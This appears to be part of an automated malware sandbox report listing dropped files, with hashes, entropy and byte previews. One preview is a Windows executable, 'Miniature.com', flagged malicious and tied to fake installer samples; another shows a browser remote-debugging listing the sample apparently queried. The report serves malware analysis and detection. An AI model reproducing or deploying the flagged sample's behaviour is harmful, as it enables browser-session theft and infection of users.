                                                                                                                                                                                                                                                                                          SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:uriCache_

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\SmartScreen\local\uriCache_

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):179
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.030954886893601
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclRQQFRj:YWLSGTt1o9LuLgfGBPAzkVj/T8lW0j
                                                                                                                                                                                                                                                                                          MD5:B7C95BE495692143123CB1A5DCA61785
                                                                                                                                                                                                                                                                                          SHA1:936BB542D056B01973B4A77C14AFE13B11C2C272
                                                                                                                                                                                                                                                                                          SHA-256:607C1A7CD451C23192EC908F16C84E1B574D5B0A88028C01A65A99C2A030CB20
                                                                                                                                                                                                                                                                                          SHA-512:258746481623A69E6FCDB8D5E4AFB21DFBB5AE442BB7E6EDF6BAF755F46A2BC93C5AD0B6897145A5E65321F68B0E643B4E646FD38A4E36EA170FEBC5768B1C8C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1734698757440432}]}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Variations

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):86
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.3751917412896075
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQp:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                          MD5:F732DBED9289177D15E236D0F8F2DDD3
                                                                                                                                                                                                                                                                                          SHA1:53F822AF51B014BC3D4B575865D9C3EF0E4DEBDE
                                                                                                                                                                                                                                                                                          SHA-256:2741DF9EE9E9D9883397078F94480E9BC1D9C76996EEC5CFE4E77929337CBE93
                                                                                                                                                                                                                                                                                          SHA-512:B64E5021F32E26C752FCBA15A139815894309B25644E74CECA46A9AA97070BCA3B77DED569A9BFD694193D035BA75B61A8D6262C8E6D5C4D76B452B38F5150A4
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":1}

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\b073fe3c-3448-404f-bed9-cf5b9ddd6e70.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):57639
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.103863469391794
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:z/Ps+wsI7ynv0PGWv/sxtw8j7VLyMV/YoskFoz:z/0+zI7ynvAv/4KeVeZoskG
                                                                                                                                                                                                                                                                                          MD5:21966544EA39ECE0EF894DABD250021A
                                                                                                                                                                                                                                                                                          SHA1:B242191EE85E7504818F5CFD38D32C50E3797F13
                                                                                                                                                                                                                                                                                          SHA-256:190CEE62F4EDDA4D6B9B977D8EAAC00AAA09FECFAF08E7323D81152708F4F23A
                                                                                                                                                                                                                                                                                          SHA-512:E17D3C20AA3A771766295ECC1B26FDCA41572CA1A492A830F201FDC340FC763264F1679803FA8B3C3E75CA2FA6C0AB0A3A628F8C8D5D09E7E01141A6359E87BE
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2278
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.851963858594624
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxrgxNxl9Il8uwpLTZYL2ZEun//iWYzmy/30eFnIdd1rc:mYYaLNsIlKdmy8eFnIm
                                                                                                                                                                                                                                                                                          MD5:BF7454DA7BB91D9B49E92DFBA2336A1D
                                                                                                                                                                                                                                                                                          SHA1:2F373E24A5DC88DD21BD43AA2AA40B5CF0F7CFFB
                                                                                                                                                                                                                                                                                          SHA-256:7186F77CF99BDC3E6A7531B23CF5AD61CDE308169EDD836A02E87D54D06AABC0
                                                                                                                                                                                                                                                                                          SHA-512:1B101D96099C28676AF5AA4B4045EF993E9F68C7CDC0243AA772ED7396B18D36FAF5BB9121096EC357B0B254403088C519BA97C22E6EC134D09B8091DB202B0F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.G.L.3.z.P.p.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.1.e.N.R.z.b.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4622
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.0075887096847245
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKxExtxD9Il8uwp7StB0JVy/CjI373dW0t/K6xbecFVcKQWB1s6sADAohaH3:jYMStT3ZrCQbecXc3WBa6nNXy7xz
                                                                                                                                                                                                                                                                                          MD5:DDB85C7F34A5B64BCD63DC6281210287
                                                                                                                                                                                                                                                                                          SHA1:645051EE0C0F734DC29E08C7FEF3972C2497705C
                                                                                                                                                                                                                                                                                          SHA-256:F912D49B3D10C7FDECEA5E74C39E5BDA2DDC2B525A9F2EB424F8B39929236092
                                                                                                                                                                                                                                                                                          SHA-512:7F44427CCC6A82377A3F8DF92529171EE8C6BB086CC65AD6A20A5D8971948F7E0883D4755F9436E6C381A71AB2B4B0A0CDD39EFBF51D5CE6C3462EDA01AF5F13
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".I.a.u.1.s.v.J.R.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.1.e.N.R.z.b.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2684
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.917459521741284
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:uiTrlKx68Wa7xyxl9Il8uw17T0xdNnHUAWnGuQARNBSRLV23tgzZj7NACd/vc:agY0X0RMf/LAV2dSZj7K/
                                                                                                                                                                                                                                                                                          MD5:3470C7C105D67280DFD701B67F4D36D0
                                                                                                                                                                                                                                                                                          SHA1:3E596508583F2FE78B5D57D6F39C0EDEE72AA433
                                                                                                                                                                                                                                                                                          SHA-256:306C6940BFAD5D8961332DDBE6C189220F1DAE5B7F292ADFE84A2F2A126FC573
                                                                                                                                                                                                                                                                                          SHA-512:20D187DCAACB15F2341C4E8138A23D779EE723759C957A0D379C7CB463FDC6148BF4068A11162719A86F837677A833067C44D418A2B13D453BDA521692847FAB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".j.V.k.5.4.8.N.w.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.1.e.N.R.z.b.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\FGDLZ049\json[1].json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3500
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.39802946449214
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:6NnCyHCSNnC0bC8NnCc9C/NnC7G8dgEC74NnCGpCGSNnCoDCMNnCYwCcNnCH63CS:6NRN1N2NSnNLVSNH5NZONt
                                                                                                                                                                                                                                                                                          MD5:2B46EDFD845FBC313F2E14055053107C
                                                                                                                                                                                                                                                                                          SHA1:3DE0E79379402D7C7C9A03640A3195BCE52B1CD2
                                                                                                                                                                                                                                                                                          SHA-256:7B3A82EB50B242D3489CE96C8F3A836C9D05FF602B162EB59F428ABB095C7917
                                                                                                                                                                                                                                                                                          SHA-512:F19BD53F3601D21FEA77D82144BE4D44EBD1DA50BABBB353B5DC4E1255C3569EFC72404DE62EF4A6BBF2A051BAC1B80A1D072305B4553002C2D624C3A381C749
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/DF101E0C0243BC4C2FB434419857025F",.. "id": "DF101E0C0243BC4C2FB434419857025F",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/DF101E0C0243BC4C2FB434419857025F"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/617D52857F7F8352B5CB1110D407ADE1",.. "id": "617D52857F7F8352B5CB1110D407ADE1",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/617D52857F7F8352B5CB1110D407ADE1"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\W1DLB4AP\json[1].json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\325114\Miniature.com
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1787
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.378251701847857
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:SfNaoCBTEC+fNaoCGkmCGZfNaoCJCsfNaoCw4MB0UrU0U8Cw4E:6NnCBTECmNnCUC8NnCJCYNnCpMB0UrU4
                                                                                                                                                                                                                                                                                          MD5:2D8A64D09570084E291BAEC50A226E58
                                                                                                                                                                                                                                                                                          SHA1:B9A3460413EB025BF96DBCA808C16190C67777BF
                                                                                                                                                                                                                                                                                          SHA-256:375A558BC0D0CB6D83633D374879832DEA75DD93BED752D7A0BD120AB2FFEA91
                                                                                                                                                                                                                                                                                          SHA-512:AAF2F04B1349D415DB514D52A3D8DD63A1BD7A1AA3E1B0C07776A49D43422A2F1F8D844933556FB7D69711277F6FCF09AB76CD0DCD6D5DC82023E59F89608D87
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/21716D8ED624605CF4B4FFDF7FFFB930",.. "id": "21716D8ED624605CF4B4FFDF7FFFB930",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/21716D8ED624605CF4B4FFDF7FFFB930"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/0FF9774EBCE0FEB9FB3D70CE9E8711CE",.. "id": "0FF9774EBCE0FEB9FB3D70CE9E8711CE",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/0FF9774EBCE0FEB9FB3D70CE9E8711CE"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\167f53e1-11de-4c74-990c-6708a5a2c0df.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\325114\Miniature.com

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                          Category:modified
                                                                                                                                                                                                                                                                                          Size (bytes):947288
                                                                                                                                                                                                                                                                                          Entropy (8bit):6.630612696399572
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
                                                                                                                                                                                                                                                                                          MD5:62D09F076E6E0240548C2F837536A46A
                                                                                                                                                                                                                                                                                          SHA1:26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
                                                                                                                                                                                                                                                                                          SHA-256:1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
                                                                                                                                                                                                                                                                                          SHA-512:32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
                                                                                                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                                                                                                          Antivirus:
                                                                                                                                                                                                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                          Joe Sandbox View:
                                                                                                                                                                                                                                                                                          • Filename: QIo3SytSZA.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: 'Setup.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: CapCut_12.0.4_Installer.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: Setup.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: 69633f.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: fm2r286nqT.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: nB52P46OJD.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: lem.exe, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          • Filename: Setup.msi, Detection: malicious, Browse
                                                                                                                                                                                                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\325114\d

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):271902
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999278006631549
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:6144:fSNgb5GRP7PyGArGI82ivTxmb8XMMFJweN+A0NY7pRSqf7U+qzLr7tDjsR1D9:qyqDPyGmF83Ib88MFJwejKipjTU+C37+
                                                                                                                                                                                                                                                                                          MD5:7EAA8308BF78634E4835CDB7066A4894
                                                                                                                                                                                                                                                                                          SHA1:4BFB519762ACAFAA7AA31CBEAC648486CD7AF6D9
                                                                                                                                                                                                                                                                                          SHA-256:5CD338ECE8613718913EA47A354C8D24131531A50C9077F03A647022FA90C18E
                                                                                                                                                                                                                                                                                          SHA-512:7C0B161753D56791106351697CA5024EAAA35DA7751DA27E925EE74FBB268B21CBA68C0F2B478A1BB22C52BDC7104A585A2B93F2721042DA8A9F7BE55AE3CE3A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.....'}g.&....w...l./....}..%...Q.4u..ts...Q..|.+.SVp.0:%..>...a}1.....'.q?!...m...y\...:...5%..g...}n.+]...?t.{-.....O<......KQ....SS...0N.0..=...O..b._...c....7....'.6{r.l.......i.1.uP.'t..0..N.....k..|..?......z./..CS.2.<..&~....r.`......z+....5....Z...kLp.[R...Yf.w%.......8.o....I.... .D..\`...'-.Ux....7..l...S*.T.IMy......H.`.f.....7.NX..s.q.4.[Z..{7.N..{..aYI..5......c4..C..K]..7..D..TV.b..ffI..>.3..7/..WU[|....c..b'?...l.m.n.........z)].(.T_p.z.v..F..;..n......P......_.}....QH.9".I(..Rtl..F...ca..d.m.Eq...CS.M....#.m..].n.XA...B<m}..=.qO./.....>.a.Xx~.....T.,x}j'.v?n........Ra.........-.....Q......C..7.c#IX......8ak.A.^....N?t..)... m.3.._W.^w...x\...*..............t8q.Q.@..7...;........$..#M..Q..szy...JW.....0...*....U..p.....A...hG...}..w..k....`.f.$e.u#.d....3...N.D...J..$...%...hg.......S.Z.X[?.j......@...:.D.<'.......cy..*|`.19w...)p..z..p..=......*..........UL....z.w*..MO.c#E.[{..en.>[f.5q....<..c.Y.A6...'.Q\-P.=0..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\3ad369ca-84c6-4ec4-af24-4709b3d2dab3.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
